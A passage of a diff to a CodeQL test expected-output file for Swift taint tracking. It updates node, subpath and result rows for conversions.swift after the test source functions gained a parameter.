conversions.swift:122:44:122:56 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:124:12:124:24 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:124:12:124:26 | .exponent | semmle.label | .exponent | -| conversions.swift:125:12:125:24 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:125:12:125:26 | .significand | semmle.label | .significand | -| conversions.swift:126:12:126:26 | call to sourceFloat80() | semmle.label | call to 
sourceFloat80() | -| conversions.swift:126:12:126:28 | .exponent | semmle.label | .exponent | -| conversions.swift:127:12:127:26 | call to sourceFloat80() | semmle.label | call to sourceFloat80() | -| conversions.swift:127:12:127:28 | .significand | semmle.label | .significand | -| conversions.swift:128:12:128:25 | call to sourceDouble() | semmle.label | call to sourceDouble() | -| conversions.swift:128:12:128:27 | .exponent | semmle.label | .exponent | -| conversions.swift:129:12:129:25 | call to sourceDouble() | semmle.label | call to sourceDouble() | -| conversions.swift:129:12:129:27 | .significand | semmle.label | .significand | -| conversions.swift:135:12:135:25 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:136:12:136:33 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:136:19:136:32 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | semmle.label | call to MyString.init(_:) | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) [some:0] | semmle.label | call to MyString.init(_:) [some:0] | -| conversions.swift:144:12:144:36 | ...! | semmle.label | ...! | -| conversions.swift:144:21:144:34 | call to sourceString() | semmle.label | call to sourceString() | +| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | +| conversions.swift:75:12:75:51 | ...! | semmle.label | ...! 
| +| conversions.swift:75:16:75:38 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | +| conversions.swift:77:30:77:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | +| conversions.swift:78:27:78:46 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:79:12:79:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:79:12:79:33 | .littleEndian | semmle.label | .littleEndian | +| conversions.swift:80:12:80:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:80:12:80:33 | .bigEndian | semmle.label | .bigEndian | +| conversions.swift:108:12:108:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:109:12:109:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:111:12:111:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:112:12:112:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:112:12:112:43 | .utf8 | semmle.label | .utf8 | +| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:113:12:113:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:114:12:114:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | 
+| conversions.swift:114:12:114:45 | .utf8 | semmle.label | .utf8 | +| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:115:12:115:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:116:12:116:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:116:12:116:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:118:12:118:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | +| conversions.swift:119:41:119:60 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | +| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | semmle.label | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:124:12:124:35 | .exponent | semmle.label | .exponent | +| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:125:12:125:35 | .significand | semmle.label | .significand | +| 
conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:126:12:126:37 | .exponent | semmle.label | .exponent | +| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:127:12:127:37 | .significand | semmle.label | .significand | +| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:128:12:128:36 | .exponent | semmle.label | .exponent | +| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:129:12:129:36 | .significand | semmle.label | .significand | +| conversions.swift:135:12:135:35 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:136:12:136:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:136:19:136:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | semmle.label | call to MyString.init(_:) | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | semmle.label | call to MyString.init(_:) [some:0] | +| conversions.swift:144:12:144:46 | ...! | semmle.label | ...! 
| +| conversions.swift:144:21:144:44 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | | conversions.swift:145:12:145:12 | ms2 | semmle.label | ms2 | | conversions.swift:146:12:146:16 | .description | semmle.label | .description | | conversions.swift:147:12:147:16 | .debugDescription | semmle.label | .debugDescription | -| conversions.swift:152:31:152:44 | call to sourceString() | semmle.label | call to sourceString() | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | | conversions.swift:153:12:153:12 | parent | semmle.label | parent | | conversions.swift:154:12:154:12 | parent | semmle.label | parent | | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | semmle.label | call to unsafeDowncast(_:to:) | @@ -312,8 +312,8 @@ nodes | conversions.swift:157:12:157:12 | v3 | semmle.label | v3 | | conversions.swift:158:12:158:12 | v3 | semmle.label | v3 | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | -| conversions.swift:172:14:172:26 | [...] [Collection element] | semmle.label | [...] [Collection element] | -| conversions.swift:172:15:172:25 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:172:14:172:33 | [...] [Collection element] | semmle.label | [...] [Collection element] | +| conversions.swift:172:15:172:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:173:13:173:13 | arr1 | semmle.label | arr1 | | conversions.swift:174:13:174:13 | arr2 | semmle.label | arr2 | | conversions.swift:175:13:175:19 | ...[...] | semmle.label | ...[...] | 
@@ -361,15 +361,15 @@ nodes | conversions.swift:225:13:225:25 | .v | semmle.label | .v | | conversions.swift:226:10:226:10 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:226:10:226:22 | .v | semmle.label | .v | -| conversions.swift:232:26:232:37 | call to sourceUInt() | semmle.label | call to sourceUInt() | -| conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:235:37:235:47 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | semmle.label | call to Int.init(withMyValue2:) | -| conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:238:38:238:48 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | semmle.label | call to mkInt(withMyValue:) | -| conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:241:43:241:53 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:232:26:232:43 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | +| conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:235:37:235:53 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | semmle.label | call to Int.init(withMyValue2:) | +| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:238:38:238:54 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | semmle.label | call to mkInt(withMyValue:) | +| conversions.swift:241:35:241:60 | 
call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:241:43:241:59 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | file://:0:0:0:0 | .first | semmle.label | .first | | file://:0:0:0:0 | .second | semmle.label | .second | | file://:0:0:0:0 | .v | semmle.label | .v | 
@@ -500,11 +500,11 @@ subpaths | conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:219:11:219:24 | .v | | conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:225:13:225:25 | .v | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:226:10:226:22 | .v | -| conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | -| conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:217:2:222:2 | self[return] | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | -| conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | -| conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | -| conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | +| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | +| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:217:2:222:2 | self[return] | 
conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | +| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | +| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | +| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | | stringinterpolation.swift:13:36:13:36 | pair [first] | stringinterpolation.swift:6:6:6:6 | self [first] | file://:0:0:0:0 | .first | stringinterpolation.swift:13:36:13:41 | .first | | stringinterpolation.swift:19:13:19:20 | call to source() | stringinterpolation.swift:6:6:6:6 | value | stringinterpolation.swift:6:6:6:6 | self [Return] [first] | stringinterpolation.swift:19:2:19:2 | [post] p1 [first] | | stringinterpolation.swift:22:21:22:21 | p1 [first] | stringinterpolation.swift:6:6:6:6 | self [first] | file://:0:0:0:0 | .first | stringinterpolation.swift:22:21:22:24 | .first | 
@@ -513,71 +513,71 @@ subpaths | stringinterpolation.swift:28:14:28:21 | call to source() | stringinterpolation.swift:7:6:7:6 | value | stringinterpolation.swift:7:6:7:6 | self [Return] [second] | stringinterpolation.swift:28:2:28:2 | [post] p2 [second] | | stringinterpolation.swift:31:21:31:21 | p2 [second] | stringinterpolation.swift:7:6:7:6 | self [second] | file://:0:0:0:0 | .second | stringinterpolation.swift:31:21:31:24 | .second | #select -| conversions.swift:32:12:32:22 | call to sourceInt() | conversions.swift:32:12:32:22 | call to sourceInt() | conversions.swift:32:12:32:22 | call to sourceInt() | result | -| conversions.swift:35:12:35:29 | call to Float.init(_:) | conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | result | -| conversions.swift:36:12:36:30 | call to String.init(_:) | conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | result | -| conversions.swift:37:12:37:32 | .utf8 | conversions.swift:37:19:37:29 | call to sourceInt() | conversions.swift:37:12:37:32 | .utf8 | result | -| conversions.swift:40:12:40:12 | arr | conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:40:12:40:12 | arr | result | -| conversions.swift:41:12:41:17 | ...[...] | conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:41:12:41:17 | ...[...] | result | -| conversions.swift:42:12:42:23 | call to Array.init(_:) | conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:42:12:42:23 | call to Array.init(_:) | result | -| conversions.swift:43:12:43:26 | ...[...] | conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:43:12:43:26 | ...[...] | result | -| conversions.swift:44:12:44:39 | call to Array.init(_:) | conversions.swift:44:20:44:33 | call to sourceString() | conversions.swift:44:12:44:39 | call to Array.init(_:) | result | -| conversions.swift:45:12:45:42 | ...[...] 
| conversions.swift:45:20:45:33 | call to sourceString() | conversions.swift:45:12:45:42 | ...[...] | result | -| conversions.swift:48:13:48:13 | v | conversions.swift:47:13:47:23 | call to sourceInt() | conversions.swift:48:13:48:13 | v | result | -| conversions.swift:52:12:52:12 | v2 | conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:52:12:52:12 | v2 | result | -| conversions.swift:55:12:55:12 | v4 | conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:55:12:55:12 | v4 | result | -| conversions.swift:64:12:64:12 | v7 | conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:64:12:64:12 | v7 | result | -| conversions.swift:75:12:75:42 | ...! | conversions.swift:75:16:75:29 | call to sourceString() | conversions.swift:75:12:75:42 | ...! | result | -| conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | result | -| conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | result | -| conversions.swift:79:12:79:24 | .littleEndian | conversions.swift:79:12:79:22 | call to sourceInt() | conversions.swift:79:12:79:24 | .littleEndian | result | -| conversions.swift:80:12:80:24 | .bigEndian | conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | result | -| conversions.swift:108:12:108:24 | call to sourceFloat() | conversions.swift:108:12:108:24 | call to sourceFloat() | conversions.swift:108:12:108:24 | call to sourceFloat() | result | -| conversions.swift:109:12:109:31 | call to Float.init(_:) | conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | result | -| conversions.swift:111:12:111:32 | call to String.init(_:) | conversions.swift:111:19:111:31 | 
call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | result | -| conversions.swift:112:12:112:34 | .utf8 | conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:34 | .utf8 | result | -| conversions.swift:113:12:113:34 | call to String.init(_:) | conversions.swift:113:19:113:33 | call to sourceFloat80() | conversions.swift:113:12:113:34 | call to String.init(_:) | result | -| conversions.swift:114:12:114:36 | .utf8 | conversions.swift:114:19:114:33 | call to sourceFloat80() | conversions.swift:114:12:114:36 | .utf8 | result | -| conversions.swift:115:12:115:33 | call to String.init(_:) | conversions.swift:115:19:115:32 | call to sourceDouble() | conversions.swift:115:12:115:33 | call to String.init(_:) | result | -| conversions.swift:116:12:116:35 | .utf8 | conversions.swift:116:19:116:32 | call to sourceDouble() | conversions.swift:116:12:116:35 | .utf8 | result | -| conversions.swift:118:12:118:31 | call to Float.init(_:) | conversions.swift:118:18:118:30 | call to sourceFloat() | conversions.swift:118:12:118:31 | call to Float.init(_:) | result | -| conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | conversions.swift:119:41:119:51 | call to sourceInt() | conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | result | -| conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | conversions.swift:120:57:120:69 | call to sourceFloat() | conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | result | -| conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | conversions.swift:122:44:122:56 | call to sourceFloat() | conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | result | -| conversions.swift:124:12:124:26 | .exponent | conversions.swift:124:12:124:24 | call to sourceFloat() | conversions.swift:124:12:124:26 | .exponent | result | -| 
conversions.swift:125:12:125:26 | .significand | conversions.swift:125:12:125:24 | call to sourceFloat() | conversions.swift:125:12:125:26 | .significand | result | -| conversions.swift:126:12:126:28 | .exponent | conversions.swift:126:12:126:26 | call to sourceFloat80() | conversions.swift:126:12:126:28 | .exponent | result | -| conversions.swift:127:12:127:28 | .significand | conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | result | -| conversions.swift:128:12:128:27 | .exponent | conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | result | -| conversions.swift:129:12:129:27 | .significand | conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | result | -| conversions.swift:135:12:135:25 | call to sourceString() | conversions.swift:135:12:135:25 | call to sourceString() | conversions.swift:135:12:135:25 | call to sourceString() | result | -| conversions.swift:136:12:136:33 | call to String.init(_:) | conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | result | -| conversions.swift:145:12:145:12 | ms2 | conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:145:12:145:12 | ms2 | result | -| conversions.swift:146:12:146:16 | .description | conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:146:12:146:16 | .description | result | -| conversions.swift:147:12:147:16 | .debugDescription | conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:147:12:147:16 | .debugDescription | result | -| conversions.swift:153:12:153:12 | parent | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:153:12:153:12 | parent | result | -| conversions.swift:154:12:154:12 | parent | conversions.swift:152:31:152:44 | call to sourceString() | 
conversions.swift:154:12:154:12 | parent | result | -| conversions.swift:157:12:157:12 | v3 | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:157:12:157:12 | v3 | result | -| conversions.swift:158:12:158:12 | v3 | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:158:12:158:12 | v3 | result | +| conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | result | +| conversions.swift:35:12:35:38 | call to Float.init(_:) | conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | result | +| conversions.swift:36:12:36:39 | call to String.init(_:) | conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | result | +| conversions.swift:37:12:37:41 | .utf8 | conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:41 | .utf8 | result | +| conversions.swift:40:12:40:12 | arr | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:40:12:40:12 | arr | result | +| conversions.swift:41:12:41:17 | ...[...] | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:41:12:41:17 | ...[...] | result | +| conversions.swift:42:12:42:23 | call to Array.init(_:) | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:42:12:42:23 | call to Array.init(_:) | result | +| conversions.swift:43:12:43:26 | ...[...] | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:43:12:43:26 | ...[...] | result | +| conversions.swift:44:12:44:48 | call to Array.init(_:) | conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:12:44:48 | call to Array.init(_:) | result | +| conversions.swift:45:12:45:51 | ...[...] 
| conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:12:45:51 | ...[...] | result | +| conversions.swift:48:13:48:13 | v | conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:48:13:48:13 | v | result | +| conversions.swift:52:12:52:12 | v2 | conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:52:12:52:12 | v2 | result | +| conversions.swift:55:12:55:12 | v4 | conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:55:12:55:12 | v4 | result | +| conversions.swift:64:12:64:12 | v7 | conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:64:12:64:12 | v7 | result | +| conversions.swift:75:12:75:51 | ...! | conversions.swift:75:16:75:38 | call to sourceString(_:) | conversions.swift:75:12:75:51 | ...! | result | +| conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | result | +| conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | result | +| conversions.swift:79:12:79:33 | .littleEndian | conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | result | +| conversions.swift:80:12:80:33 | .bigEndian | conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | result | +| conversions.swift:108:12:108:33 | call to sourceFloat(_:) | conversions.swift:108:12:108:33 | call to sourceFloat(_:) | conversions.swift:108:12:108:33 | call to sourceFloat(_:) | result | +| conversions.swift:109:12:109:40 | call to Float.init(_:) | conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | result | +| conversions.swift:111:12:111:41 | call to String.init(_:) | 
conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | result | +| conversions.swift:112:12:112:43 | .utf8 | conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:43 | .utf8 | result | +| conversions.swift:113:12:113:43 | call to String.init(_:) | conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | result | +| conversions.swift:114:12:114:45 | .utf8 | conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:45 | .utf8 | result | +| conversions.swift:115:12:115:42 | call to String.init(_:) | conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | result | +| conversions.swift:116:12:116:44 | .utf8 | conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:44 | .utf8 | result | +| conversions.swift:118:12:118:40 | call to Float.init(_:) | conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | result | +| conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | result | +| conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | result | +| conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | result | +| conversions.swift:124:12:124:35 | .exponent | conversions.swift:124:12:124:33 | call to sourceFloat(_:) | 
conversions.swift:124:12:124:35 | .exponent | result | +| conversions.swift:125:12:125:35 | .significand | conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | result | +| conversions.swift:126:12:126:37 | .exponent | conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | result | +| conversions.swift:127:12:127:37 | .significand | conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | result | +| conversions.swift:128:12:128:36 | .exponent | conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | result | +| conversions.swift:129:12:129:36 | .significand | conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | result | +| conversions.swift:135:12:135:35 | call to sourceString(_:) | conversions.swift:135:12:135:35 | call to sourceString(_:) | conversions.swift:135:12:135:35 | call to sourceString(_:) | result | +| conversions.swift:136:12:136:43 | call to String.init(_:) | conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | result | +| conversions.swift:145:12:145:12 | ms2 | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:145:12:145:12 | ms2 | result | +| conversions.swift:146:12:146:16 | .description | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:146:12:146:16 | .description | result | +| conversions.swift:147:12:147:16 | .debugDescription | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:147:12:147:16 | .debugDescription | result | +| conversions.swift:153:12:153:12 | parent | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:153:12:153:12 | parent | result | +| conversions.swift:154:12:154:12 | parent | 
conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:154:12:154:12 | parent | result | +| conversions.swift:157:12:157:12 | v3 | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:157:12:157:12 | v3 | result | +| conversions.swift:158:12:158:12 | v3 | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:158:12:158:12 | v3 | result | | conversions.swift:173:13:173:13 | arr1 | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | result | -| conversions.swift:174:13:174:13 | arr2 | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:174:13:174:13 | arr2 | result | +| conversions.swift:174:13:174:13 | arr2 | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:174:13:174:13 | arr2 | result | | conversions.swift:175:13:175:19 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | result | -| conversions.swift:176:13:176:19 | ...[...] | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:176:13:176:19 | ...[...] | result | +| conversions.swift:176:13:176:19 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:176:13:176:19 | ...[...] | result | | conversions.swift:180:13:180:13 | arr1b | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:180:13:180:13 | arr1b | result | -| conversions.swift:181:13:181:13 | arr2b | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:181:13:181:13 | arr2b | result | +| conversions.swift:181:13:181:13 | arr2b | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:181:13:181:13 | arr2b | result | | conversions.swift:182:13:182:20 | ...[...] | conversions.swift:171:14:171:33 | call to 